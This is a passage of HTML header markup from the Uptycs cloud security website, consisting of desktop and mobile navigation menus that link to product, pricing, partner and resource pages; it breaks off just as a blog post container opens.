          <div class="sub-header"><h5><span>CNAPP Hybrid Cloud Security</span></h5>
<p><span>Protect, Detect, Respond</span></p></div>
          
          <div class="submenu_menu">
            <span id="hs_cos_wrapper_mega-menu-new_" class="hs_cos_wrapper hs_cos_wrapper_widget hs_cos_wrapper_type_simple_menu" style="" data-hs-cos-general-type="widget" data-hs-cos-type="simple_menu"><div id="hs_menu_wrapper_mega-menu-new_" class="hs-menu-wrapper active-branch flyouts hs-menu-flow-horizontal" role="navigation" data-sitemap-name="" data-menu-id="" aria-label="Navigation Menu">
 <ul role="menu">
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.uptycs.com/products/cnapp" role="menuitem" target="_self">Platform</a></li>
 </ul>
</div></span>
          </div>
        </li>
        
        <li class="submenu-box">
          
          <div class="sub-header"><h5><span>Solutions<br></span><span></span></h5>
<p>&nbsp;</p></div>
          
          <div class="submenu_menu">
            <span id="hs_cos_wrapper_mega-menu-new_" class="hs_cos_wrapper hs_cos_wrapper_widget hs_cos_wrapper_type_simple_menu" style="" data-hs-cos-general-type="widget" data-hs-cos-type="simple_menu"><div id="hs_menu_wrapper_mega-menu-new_" class="hs-menu-wrapper active-branch flyouts hs-menu-flow-horizontal" role="navigation" data-sitemap-name="" data-menu-id="" aria-label="Navigation Menu">
 <ul role="menu">
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.uptycs.com/products/cnapp/cwpp" role="menuitem" target="_self">Workload Protection</a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.uptycs.com/products/cnapp/cspm" role="menuitem" target="_self">Posture Management</a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.uptycs.com/products/use-cases/cloud-threat-prevention-defend-against-cloud-threats" role="menuitem" target="_self">Cloud Detection &amp; Response</a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.uptycs.com/products/use-cases/vulnerability-scanning" role="menuitem" target="_self">Vulnerability Management</a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.uptycs.com/products/attack-surfaces/containers-kubernetes" role="menuitem" target="_self">Container Security</a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.uptycs.com/solutions/software-supply-chain-security-protect-workloads-against-emerging-threats" role="menuitem" target="_self">Software Supply Chain Security</a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.uptycs.com/products/cnapp/file-integrity-monitoring-enhanced-security" role="menuitem" target="_self">File Integrity Monitoring</a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.uptycs.com/products/cnapp/hybrid-cloud-asset-management" role="menuitem" target="_self">Asset Management</a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.uptycs.com/products/use-cases/strengthening-security-integrated-compliance-platform" role="menuitem" target="_self">Compliance &amp; Risk</a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.uptycs.com/products/system-insight" role="menuitem" target="_self">Visibility and User Behavior</a></li>
 </ul>
</div></span>
          </div>
        </li>
        
        
        <li class="sub-menu-post-item">
            <div class="menu-post-image">
              
              
              <img class="img-src" src="https://www.uptycs.com/hubfs/gartner-market-guide.png" alt="gartner-market-guide" loading="">
              
            </div>
            <div class="post-content">
              <h5><span>2024 Gartner® Market Guide for Cloud-Native Application Protection Platforms (CNAPP)</span></h5>
<p><a href="https://www.uptycs.com/resources/analyst-reports/gartner-cnapp-market-guide-2024" rel="noopener"><span>Learn more</span></a></p>
            </div>
        </li>
        
      </ul>
      
    </li>
    
    <li class="menu__item menu__item--has-submenux li-active-link">
    <a class="menu__link top-menu-link active-link" href="https://www.uptycs.com/pricing">
      Pricing
    </a>
      
    </li>
    
    <li class="menu__item menu__item--has-submenux ">
    <a class="menu__link top-menu-link " href="">
      Environments
    </a>
      
      <ul class="sub-menu">
        
        <li class="submenu-box">
          
          <div class="sub-header"><h5><span>Environments</span></h5></div>
          
          <div class="submenu_menu">
            <span id="hs_cos_wrapper_mega-menu-new_" class="hs_cos_wrapper hs_cos_wrapper_widget hs_cos_wrapper_type_simple_menu" style="" data-hs-cos-general-type="widget" data-hs-cos-type="simple_menu"><div id="hs_menu_wrapper_mega-menu-new_" class="hs-menu-wrapper active-branch flyouts hs-menu-flow-horizontal" role="navigation" data-sitemap-name="" data-menu-id="" aria-label="Navigation Menu">
 <ul role="menu">
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.uptycs.com/partners/aws" role="menuitem" target="_self">AWS</a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.uptycs.com/partners/azure" role="menuitem" target="_self">Microsoft Azure</a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.uptycs.com/partners/google-cloud-security" role="menuitem" target="_self">Google Cloud</a></li>
 </ul>
</div></span>
          </div>
        </li>
        
        <li class="submenu-box">
          
          <div class="sub-header"><h5><span>Integrations</span></h5></div>
          
          <div class="submenu_menu">
            <span id="hs_cos_wrapper_mega-menu-new_" class="hs_cos_wrapper hs_cos_wrapper_widget hs_cos_wrapper_type_simple_menu" style="" data-hs-cos-general-type="widget" data-hs-cos-type="simple_menu"><div id="hs_menu_wrapper_mega-menu-new_" class="hs-menu-wrapper active-branch flyouts hs-menu-flow-horizontal" role="navigation" data-sitemap-name="" data-menu-id="" aria-label="Navigation Menu">
 <ul role="menu">
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.uptycs.com/tools-and-integrations" role="menuitem" target="_self">Tools and Integrations</a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.uptycs.com/partners/checkmarx" role="menuitem" target="_self">Checkmarx</a></li>
 </ul>
</div></span>
          </div>
        </li>
        
        
        <li class="sub-menu-post-item">
            <div class="menu-post-image">
              
              
              <img class="img-src" src="https://www.uptycs.com/hubfs/1k-marketplace-challenge-aws.png" alt="1k-marketplace-challenge-aws" loading="">
              
            </div>
            <div class="post-content">
              <h5><span>Take the $1K<br>Marketplace Challenge</span></h5>
<p><a href="https://www.uptycs.com/resources/aws-marketplace-challenge-2024" rel="noopener"><span>Learn more</span></a></p>
            </div>
        </li>
        
      </ul>
      
    </li>
    
    <li class="menu__item menu__item--has-submenux ">
    <a class="menu__link top-menu-link " href="">
      Why Uptycs
    </a>
      
      <ul class="sub-menu">
        
        <li class="submenu-box">
          
          <div class="sub-header"><h5><span>Why Uptycs</span></h5></div>
          
          <div class="submenu_menu">
            <span id="hs_cos_wrapper_mega-menu-new_" class="hs_cos_wrapper hs_cos_wrapper_widget hs_cos_wrapper_type_simple_menu" style="" data-hs-cos-general-type="widget" data-hs-cos-type="simple_menu"><div id="hs_menu_wrapper_mega-menu-new_" class="hs-menu-wrapper active-branch flyouts hs-menu-flow-horizontal" role="navigation" data-sitemap-name="" data-menu-id="" aria-label="Navigation Menu">
 <ul role="menu">
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.uptycs.com/about" role="menuitem" target="_self">About Us</a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.uptycs.com/resources?filter=customer_stories" role="menuitem" target="_self">Case Studies </a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.uptycs.com/reviews" role="menuitem" target="_self">Reviews</a></li>
 </ul>
</div></span>
          </div>
        </li>
        
        <li class="submenu-box">
          
          <div class="sub-header"><h5><span>Compare Uptycs</span></h5></div>
          
          <div class="submenu_menu">
            <span id="hs_cos_wrapper_mega-menu-new_" class="hs_cos_wrapper hs_cos_wrapper_widget hs_cos_wrapper_type_simple_menu" style="" data-hs-cos-general-type="widget" data-hs-cos-type="simple_menu"><div id="hs_menu_wrapper_mega-menu-new_" class="hs-menu-wrapper active-branch flyouts hs-menu-flow-horizontal" role="navigation" data-sitemap-name="" data-menu-id="" aria-label="Navigation Menu">
 <ul role="menu">
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.uptycs.com/compare-us/aqua" role="menuitem" target="_self">Aqua</a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.uptycs.com/compare-us/lacework" role="menuitem" target="_self">Lacework</a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.uptycs.com/compare-us/sysdig" role="menuitem" target="_self">Sysdig</a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.uptycs.com/compare-us/crowdstrike" role="menuitem" target="_self">CrowdStrike</a></li>
 </ul>
</div></span>
          </div>
        </li>
        
        
        <li class="sub-menu-post-item">
            <div class="menu-post-image">
              
              
              <img class="img-src" src="https://www.uptycs.com/hubfs/key-insights-2024-gartner.png" alt="key-insights-2024-gartner" loading="">
              
            </div>
            <div class="post-content">
              <h5><span>Enhancing Cloud Security: Key Insights from the 2024 Gartner Market Guide for CNAPP</span></h5>
<p><a href="https://www.uptycs.com/blog/key-insights-gartner-cnapp-guide-2024" rel="noopener"><span>Learn more</span></a></p>
            </div>
        </li>
        
      </ul>
      
    </li>
    
    <li class="menu__item menu__item--has-submenux ">
    <a class="menu__link top-menu-link " href="">
      Resources
    </a>
      
      <ul class="sub-menu">
        
        <li class="submenu-box">
          
          <div class="sub-header"><h5><span>Resources</span></h5></div>
          
          <div class="submenu_menu">
            <span id="hs_cos_wrapper_mega-menu-new_" class="hs_cos_wrapper hs_cos_wrapper_widget hs_cos_wrapper_type_simple_menu" style="" data-hs-cos-general-type="widget" data-hs-cos-type="simple_menu"><div id="hs_menu_wrapper_mega-menu-new_" class="hs-menu-wrapper active-branch flyouts hs-menu-flow-horizontal" role="navigation" data-sitemap-name="" data-menu-id="" aria-label="Navigation Menu">
 <ul role="menu">
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.uptycs.com/resources?filter=analyst_reports" role="menuitem" target="_self">Analyst Reports</a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.uptycs.com/resources?filter=product_briefs" role="menuitem" target="_self">Product Briefs</a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.uptycs.com/blog" role="menuitem" target="_self">Blog</a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.uptycs.com/video-hub" role="menuitem" target="_self">Video Hub </a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.uptycs.com/blog/threat-research-report-team" role="menuitem" target="_self">Threat Research Report Team</a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.uptycs.com/resources?filter=guides" role="menuitem" target="_self">Whitepapers</a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.uptycs.com/resources?filter=guides" role="menuitem" target="_self">E-books</a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.uptycs.com/resources?filter=guides" role="menuitem" target="_self">Guides</a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.uptycs.com/resources?filter=threat_intelligence" role="menuitem" target="_self">Threat Quarterly Reports</a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.uptycs.com/master-glossary" role="menuitem" target="_self">Glossary</a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.uptycs.com/events" role="menuitem" target="_self">Webinars and Events</a></li>
 </ul>
</div></span>
          </div>
        </li>
        
        <li class="submenu-box">
          
          <div class="sub-header"><h5><span>Company</span></h5></div>
          
          <div class="submenu_menu">
            <span id="hs_cos_wrapper_mega-menu-new_" class="hs_cos_wrapper hs_cos_wrapper_widget hs_cos_wrapper_type_simple_menu" style="" data-hs-cos-general-type="widget" data-hs-cos-type="simple_menu"><div id="hs_menu_wrapper_mega-menu-new_" class="hs-menu-wrapper active-branch flyouts hs-menu-flow-horizontal" role="navigation" data-sitemap-name="" data-menu-id="" aria-label="Navigation Menu">
 <ul role="menu">
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.uptycs.com/about/career" role="menuitem" target="_self">Careers</a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.uptycs.com/press-news-release" role="menuitem" target="_self">News</a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.uptycs.com/cybersecurity-standup" role="menuitem" target="_self">CSU</a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.uptycs.com/services-support" role="menuitem" target="_self">Support</a></li>
 </ul>
</div></span>
          </div>
        </li>
        
        
        <li class="sub-menu-post-item">
            <div class="menu-post-image">
              
              
              <img class="img-src" src="https://www.uptycs.com/hubfs/gartner-market-guide.png" alt="gartner-market-guide" loading="">
              
            </div>
            <div class="post-content">
              <h5><span>2024 Gartner® Market Guide for Cloud-Native Application Protection Platforms (CNAPP)</span></h5>
<p><a href="https://www.uptycs.com/resources/analyst-reports/gartner-cnapp-market-guide-2024" rel="noopener"><span>Learn more</span></a></p>
            </div>
        </li>
        
      </ul>
      
    </li>
    
    <li class="menu__item menu__item--has-submenux ">
    <a class="menu__link top-menu-link " href="">
      Partners
    </a>
      
      <ul class="sub-menu">
        
        <li class="submenu-box">
          
          <div class="sub-header"><h5><span>Partners</span></h5></div>
          
          <div class="submenu_menu">
            <span id="hs_cos_wrapper_mega-menu-new_" class="hs_cos_wrapper hs_cos_wrapper_widget hs_cos_wrapper_type_simple_menu" style="" data-hs-cos-general-type="widget" data-hs-cos-type="simple_menu"><div id="hs_menu_wrapper_mega-menu-new_" class="hs-menu-wrapper active-branch flyouts hs-menu-flow-horizontal" role="navigation" data-sitemap-name="" data-menu-id="" aria-label="Navigation Menu">
 <ul role="menu">
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.uptycs.com/partners" role="menuitem" target="_self">Upward Partner Program</a></li>
 </ul>
</div></span>
          </div>
        </li>
        
        
      </ul>
      
    </li>
    
  </ul>
</nav>




<nav class="menu menu--mobile" aria-label="Main menu">
  <ul class="menu__wrapper no-list">
    







<li class="menu__item menu__item--depth-1 menu__item--has-submenu hs-skip-lang-url-rewrite">
  
  
  <a class="menu__link menu__link--toggle" href="#" aria-haspopup="true" aria-expanded="false">Platform</a>
  
  
  
  
  <button class="menu__child-toggle no-button" aria-expanded="false">
    <span class="show-for-sr">Show submenu for Platform</span>
    <span class="menu__child-toggle-icon"></span>
  </button>
  <ul class="menu__submenu menu__submenu--level-2 no-list">
    
    
    
<li class="menu__item menu__item--depth-2 menu__item--has-submenu hs-skip-lang-url-rewrite">
  
  
  <a class="menu__link menu__link--toggle" href="#" aria-haspopup="true" aria-expanded="false">CNAPP Hybrid Cloud Security <br> <span>Protect, Detect, Respond</span></a>
  
  
  
  
  <button class="menu__child-toggle no-button" aria-expanded="false">
    <span class="show-for-sr">Show submenu for CNAPP Hybrid Cloud Security <br> <span>Protect, Detect, Respond</span></span>
    <span class="menu__child-toggle-icon"></span>
  </button>
  <ul class="menu__submenu menu__submenu--level-3 no-list">
    
    
    
<li class="menu__item menu__item--depth-3  hs-skip-lang-url-rewrite">
  
  <a class="menu__link   " href="https://www.uptycs.com/products/cnapp">Platform</a>
  
  
</li>

    
  </ul>
  
  
</li>

    
    
<li class="menu__item menu__item--depth-2 menu__item--has-submenu hs-skip-lang-url-rewrite">
  
  
  <a class="menu__link menu__link--toggle" href="#" aria-haspopup="true" aria-expanded="false">Solutions</a>
  
  
  
  
  <button class="menu__child-toggle no-button" aria-expanded="false">
    <span class="show-for-sr">Show submenu for Solutions</span>
    <span class="menu__child-toggle-icon"></span>
  </button>
  <ul class="menu__submenu menu__submenu--level-3 no-list">
    
    
    
<li class="menu__item menu__item--depth-3  hs-skip-lang-url-rewrite">
  
  <a class="menu__link   " href="https://www.uptycs.com/products/cnapp/cwpp">Workload Protection</a>
  
  
</li>

    
    
<li class="menu__item menu__item--depth-3  hs-skip-lang-url-rewrite">
  
  <a class="menu__link   " href="https://www.uptycs.com/products/cnapp/cspm">Posture Management</a>
  
  
</li>

    
    
<li class="menu__item menu__item--depth-3  hs-skip-lang-url-rewrite">
  
  <a class="menu__link   " href="https://www.uptycs.com/products/use-cases/vulnerability-scanning">Vulnerability Management</a>
  
  
</li>

    
    
<li class="menu__item menu__item--depth-3  hs-skip-lang-url-rewrite">
  
  <a class="menu__link   " href="https://www.uptycs.com/products/use-cases/cloud-threat-prevention-defend-against-cloud-threats">Cloud Detection &amp; Response</a>
  
  
</li>

    
    
<li class="menu__item menu__item--depth-3  hs-skip-lang-url-rewrite">
  
  <a class="menu__link   " href="https://www.uptycs.com/products/attack-surfaces/containers-kubernetes">Container Security</a>
  
  
</li>

    
    
<li class="menu__item menu__item--depth-3  hs-skip-lang-url-rewrite">
  
  <a class="menu__link   " href="https://www.uptycs.com/solutions/software-supply-chain-security-protect-workloads-against-emerging-threats">Software Supply Chain Security</a>
  
  
</li>

    
    
<li class="menu__item menu__item--depth-3  hs-skip-lang-url-rewrite">
  
  <a class="menu__link   " href="https://www.uptycs.com/products/cnapp/file-integrity-monitoring-enhanced-security">File Integrity Monitoring</a>
  
  
</li>

    
    
<li class="menu__item menu__item--depth-3  hs-skip-lang-url-rewrite">
  
  <a class="menu__link   " href="https://www.uptycs.com/products/cnapp/hybrid-cloud-asset-management">Asset Management</a>
  
  
</li>

    
    
<li class="menu__item menu__item--depth-3  hs-skip-lang-url-rewrite">
  
  <a class="menu__link   " href="https://www.uptycs.com/products/use-cases/strengthening-security-integrated-compliance-platform">Compliance &amp; Risk</a>
  
  
</li>

    
    
<li class="menu__item menu__item--depth-3  hs-skip-lang-url-rewrite">
  
  <a class="menu__link   " href="https://www.uptycs.com/products/system-insight">Visibility and User Behavior</a>
  
  
</li>

    
  </ul>
  
  
</li>

    
  </ul>
  
  
</li>



<li class="menu__item menu__item--depth-1  hs-skip-lang-url-rewrite">
  
  <a class="menu__link   " href="https://www.uptycs.com/pricing">Pricing</a>
  
  
</li>



<li class="menu__item menu__item--depth-1 menu__item--has-submenu hs-skip-lang-url-rewrite">
  
  
  <a class="menu__link menu__link--toggle" href="#" aria-haspopup="true" aria-expanded="false">Environments</a>
  
  
  
  
  <button class="menu__child-toggle no-button" aria-expanded="false">
    <span class="show-for-sr">Show submenu for Environments</span>
    <span class="menu__child-toggle-icon"></span>
  </button>
  <ul class="menu__submenu menu__submenu--level-2 no-list">
    
    
    
<li class="menu__item menu__item--depth-2 menu__item--has-submenu hs-skip-lang-url-rewrite">
  
  
  <a class="menu__link menu__link--toggle" href="#" aria-haspopup="true" aria-expanded="false">Environments</a>
  
  
  
  
  <button class="menu__child-toggle no-button" aria-expanded="false">
    <span class="show-for-sr">Show submenu for Environments</span>
    <span class="menu__child-toggle-icon"></span>
  </button>
  <ul class="menu__submenu menu__submenu--level-3 no-list">
    
    
    
<li class="menu__item menu__item--depth-3  hs-skip-lang-url-rewrite">
  
  <a class="menu__link   " href="https://www.uptycs.com/partners/aws">AWS</a>
  
  
</li>

    
    
<li class="menu__item menu__item--depth-3  hs-skip-lang-url-rewrite">
  
  <a class="menu__link   " href="https://www.uptycs.com/partners/azure">Microsoft Azure</a>
  
  
</li>

    
    
<li class="menu__item menu__item--depth-3  hs-skip-lang-url-rewrite">
  
  <a class="menu__link   " href="https://www.uptycs.com/partners/google-cloud-security">Google Cloud</a>
  
  
</li>

    
  </ul>
  
  
</li>

    
    
<li class="menu__item menu__item--depth-2 menu__item--has-submenu hs-skip-lang-url-rewrite">
  
  
  <a class="menu__link menu__link--toggle" href="#" aria-haspopup="true" aria-expanded="false">Integrations</a>
  
  
  
  
  <button class="menu__child-toggle no-button" aria-expanded="false">
    <span class="show-for-sr">Show submenu for Integrations</span>
    <span class="menu__child-toggle-icon"></span>
  </button>
  <ul class="menu__submenu menu__submenu--level-3 no-list">
    
    
    
<li class="menu__item menu__item--depth-3  hs-skip-lang-url-rewrite">
  
  <a class="menu__link   " href="https://www.uptycs.com/tools-and-integrations">Tools and Integrations</a>
  
  
</li>

    
    
<li class="menu__item menu__item--depth-3  hs-skip-lang-url-rewrite">
  
  <a class="menu__link   " href="https://www.uptycs.com/partners/checkmarx">Checkmarx</a>
  
  
</li>

    
  </ul>
  
  
</li>

    
  </ul>
  
  
</li>



<li class="menu__item menu__item--depth-1 menu__item--has-submenu hs-skip-lang-url-rewrite">
  
  
  <a class="menu__link menu__link--toggle" href="#" aria-haspopup="true" aria-expanded="false">Why Uptycs</a>
  
  
  
  
  <button class="menu__child-toggle no-button" aria-expanded="false">
    <span class="show-for-sr">Show submenu for Why Uptycs</span>
    <span class="menu__child-toggle-icon"></span>
  </button>
  <ul class="menu__submenu menu__submenu--level-2 no-list">
    
    
    
<li class="menu__item menu__item--depth-2 menu__item--has-submenu hs-skip-lang-url-rewrite">
  
  
  <a class="menu__link menu__link--toggle" href="#" aria-haspopup="true" aria-expanded="false">Why Uptycs</a>
  
  
  
  
  <button class="menu__child-toggle no-button" aria-expanded="false">
    <span class="show-for-sr">Show submenu for Why Uptycs</span>
    <span class="menu__child-toggle-icon"></span>
  </button>
  <ul class="menu__submenu menu__submenu--level-3 no-list">
    
    
    
<li class="menu__item menu__item--depth-3  hs-skip-lang-url-rewrite">
  
  <a class="menu__link   " href="https://www.uptycs.com/about">About Us</a>
  
  
</li>

    
    
<li class="menu__item menu__item--depth-3  hs-skip-lang-url-rewrite">
  
  <a class="menu__link   " href="https://www.uptycs.com/resources?filter=customer_stories">Case Studies </a>
  
  
</li>

    
    
<li class="menu__item menu__item--depth-3  hs-skip-lang-url-rewrite">
  
  <a class="menu__link   " href="https://www.uptycs.com/reviews">Reviews</a>
  
  
</li>

    
  </ul>
  
  
</li>

    
    
<li class="menu__item menu__item--depth-2 menu__item--has-submenu hs-skip-lang-url-rewrite">
  
  
  <a class="menu__link menu__link--toggle" href="#" aria-haspopup="true" aria-expanded="false">Compare Uptycs </a>
  
  
  
  
  <button class="menu__child-toggle no-button" aria-expanded="false">
    <span class="show-for-sr">Show submenu for Compare Uptycs </span>
    <span class="menu__child-toggle-icon"></span>
  </button>
  <ul class="menu__submenu menu__submenu--level-3 no-list">
    
    
    
<li class="menu__item menu__item--depth-3  hs-skip-lang-url-rewrite">
  
  <a class="menu__link   " href="https://www.uptycs.com/compare-us/aqua">Aqua</a>
  
  
</li>

    
    
<li class="menu__item menu__item--depth-3  hs-skip-lang-url-rewrite">
  
  <a class="menu__link   " href="https://www.uptycs.com/compare-us/lacework">Lacework</a>
  
  
</li>

    
    
<li class="menu__item menu__item--depth-3  hs-skip-lang-url-rewrite">
  
  <a class="menu__link   " href="https://www.uptycs.com/compare-us/sysdig">Sysdig</a>
  
  
</li>

    
    
<li class="menu__item menu__item--depth-3  hs-skip-lang-url-rewrite">
  
  <a class="menu__link   " href="https://www.uptycs.com/compare-us/crowdstrike">CrowdStrike</a>
  
  
</li>

    
  </ul>
  
  
</li>

    
  </ul>
  
  
</li>



<li class="menu__item menu__item--depth-1 menu__item--has-submenu hs-skip-lang-url-rewrite">
  
  
  <a class="menu__link menu__link--toggle" href="#" aria-haspopup="true" aria-expanded="false">Resources</a>
  
  
  
  
  <button class="menu__child-toggle no-button" aria-expanded="false">
    <span class="show-for-sr">Show submenu for Resources</span>
    <span class="menu__child-toggle-icon"></span>
  </button>
  <ul class="menu__submenu menu__submenu--level-2 no-list">
    
    
    
<li class="menu__item menu__item--depth-2 menu__item--has-submenu hs-skip-lang-url-rewrite">
  
  
  <a class="menu__link menu__link--toggle" href="#" aria-haspopup="true" aria-expanded="false">Resources</a>
  
  
  
  
  <button class="menu__child-toggle no-button" aria-expanded="false">
    <span class="show-for-sr">Show submenu for Resources</span>
    <span class="menu__child-toggle-icon"></span>
  </button>
  <ul class="menu__submenu menu__submenu--level-3 no-list">
    
    
    
<li class="menu__item menu__item--depth-3  hs-skip-lang-url-rewrite">
  
  <a class="menu__link   " href="https://www.uptycs.com/resources?filter=analyst_reports">Analyst Reports</a>
  
  
</li>

    
    
<li class="menu__item menu__item--depth-3  hs-skip-lang-url-rewrite">
  
  <a class="menu__link   " href="https://www.uptycs.com/resources?filter=product_briefs">Product Briefs</a>
  
  
</li>

    
    
<li class="menu__item menu__item--depth-3  hs-skip-lang-url-rewrite">
  
  <a class="menu__link   " href="https://www.uptycs.com/blog">Blog</a>
  
  
</li>

    
    
<li class="menu__item menu__item--depth-3  hs-skip-lang-url-rewrite">
  
  <a class="menu__link   " href="https://www.uptycs.com/video-hub">Video Hub </a>
  
  
</li>

    
    
<li class="menu__item menu__item--depth-3  hs-skip-lang-url-rewrite">
  
  <a class="menu__link   " href="https://www.uptycs.com/blog/threat-research-report-team">Threat Research Report Team</a>
  
  
</li>

    
    
<li class="menu__item menu__item--depth-3  hs-skip-lang-url-rewrite">
  
  <a class="menu__link   " href="https://www.uptycs.com/resources?filter=guides">Whitepapers</a>
  
  
</li>

    
    
<li class="menu__item menu__item--depth-3  hs-skip-lang-url-rewrite">
  
  <a class="menu__link   " href="https://www.uptycs.com/resources?filter=guides">E-books</a>
  
  
</li>

    
    
<li class="menu__item menu__item--depth-3  hs-skip-lang-url-rewrite">
  
  <a class="menu__link   " href="https://www.uptycs.com/resources?filter=guides">Guides</a>
  
  
</li>

    
    
<li class="menu__item menu__item--depth-3  hs-skip-lang-url-rewrite">
  
  <a class="menu__link   " href="https://www.uptycs.com/resources?filter=threat_intelligence">Threat Quarterly Reports</a>
  
  
</li>

    
    
<li class="menu__item menu__item--depth-3  hs-skip-lang-url-rewrite">
  
  <a class="menu__link   " href="https://www.uptycs.com/master-glossary">Glossary</a>
  
  
</li>

    
    
<li class="menu__item menu__item--depth-3  hs-skip-lang-url-rewrite">
  
  <a class="menu__link   " href="https://www.uptycs.com/events">Webinars and Events</a>
  
  
</li>

    
  </ul>
  
  
</li>

    
    
<li class="menu__item menu__item--depth-2 menu__item--has-submenu hs-skip-lang-url-rewrite">
  
  
  <a class="menu__link menu__link--toggle" href="#" aria-haspopup="true" aria-expanded="false">Company</a>
  
  
  
  
  <button class="menu__child-toggle no-button" aria-expanded="false">
    <span class="show-for-sr">Show submenu for Company</span>
    <span class="menu__child-toggle-icon"></span>
  </button>
  <ul class="menu__submenu menu__submenu--level-3 no-list">
    
    
    
<li class="menu__item menu__item--depth-3  hs-skip-lang-url-rewrite">
  
  <a class="menu__link   " href="https://www.uptycs.com/about/career">Careers</a>
  
  
</li>

    
    
<li class="menu__item menu__item--depth-3  hs-skip-lang-url-rewrite">
  
  <a class="menu__link   " href="https://www.uptycs.com/press-news-release">News</a>
  
  
</li>

    
    
<li class="menu__item menu__item--depth-3  hs-skip-lang-url-rewrite">
  
  <a class="menu__link   " href="https://www.uptycs.com/cybersecurity-standup">CSU</a>
  
  
</li>

    
    
<li class="menu__item menu__item--depth-3  hs-skip-lang-url-rewrite">
  
  <a class="menu__link   " href="https://www.uptycs.com/services-support">Support</a>
  
  
</li>

    
  </ul>
  
  
</li>

    
  </ul>
  
  
</li>



<li class="menu__item menu__item--depth-1 menu__item--has-submenu hs-skip-lang-url-rewrite">
  
  
  <a class="menu__link menu__link--toggle" href="#" aria-haspopup="true" aria-expanded="false">Partners</a>
  
  
  
  
  <button class="menu__child-toggle no-button" aria-expanded="false">
    <span class="show-for-sr">Show submenu for Partners</span>
    <span class="menu__child-toggle-icon"></span>
  </button>
  <ul class="menu__submenu menu__submenu--level-2 no-list">
    
    
    
<li class="menu__item menu__item--depth-2 menu__item--has-submenu hs-skip-lang-url-rewrite">
  
  
  <a class="menu__link menu__link--toggle" href="#" aria-haspopup="true" aria-expanded="false">Partners</a>
  
  
  
  
  <button class="menu__child-toggle no-button" aria-expanded="false">
    <span class="show-for-sr">Show submenu for Partners</span>
    <span class="menu__child-toggle-icon"></span>
  </button>
  <ul class="menu__submenu menu__submenu--level-3 no-list">
    
    
    
<li class="menu__item menu__item--depth-3  hs-skip-lang-url-rewrite">
  
  <a class="menu__link   " href="https://www.uptycs.com/partners">Upward Partner Program</a>
  
  
</li>

    
  </ul>
  
  
</li>

    
  </ul>
  
  
</li>




  </ul>
</nav>


</div> 
            </div>

            <!--             mobile  -->
            <div class="cta_login mobile">

             

               


              <div class="header__row-2">
               
                
              </div>

              
              <div class="header__row-3">
                <div class="header-menu-cta mobile">
                  <div id="hs_cos_wrapper_module_171764893606315" class="hs_cos_wrapper hs_cos_wrapper_widget hs_cos_wrapper_type_module" style="" data-hs-cos-general-type="widget" data-hs-cos-type="module"><div class="header-cta-outer">
  <div class="log-cta">
    <a href=""></a>
  </div>
  <div class="demo-cta">
    <a href="https://www.uptycs.com/request-demo">Get demo</a>
  </div>
</div>
 
</div>
                </div>
              </div>
            </div>
            <!--  mobile  -->

          </div>

        </div>

        

        <div class="header__row-2">
         
          
        </div>

        
        <div class="header__row-3">
          <div class="header-menu-cta desktop">
            <div id="hs_cos_wrapper_module_171764893606315" class="hs_cos_wrapper hs_cos_wrapper_widget hs_cos_wrapper_type_module" style="" data-hs-cos-general-type="widget" data-hs-cos-type="module"><div class="header-cta-outer">
  <div class="log-cta">
    <a href=""></a>
  </div>
  <div class="demo-cta">
    <a href="https://www.uptycs.com/request-demo">Get demo</a>
  </div>
</div>
 
</div>
          </div>
        </div>

      </div>

    </div>

    

    <div class="container-fluid content-wrapper">
<div class="row-fluid-wrapper">
<div class="row-fluid">
<div class="span12 widget-span widget-type-cell " style="" data-widget-type="cell" data-x="0" data-w="12">

</div><!--end widget-span -->
</div>
</div>
</div>
  </div>
</header></div>
       

      

      <main id="main-content" class="body-container-wrapper">
        

<div class="body-container body-container--blog-post blog-post-new blog-post-new-design"> 

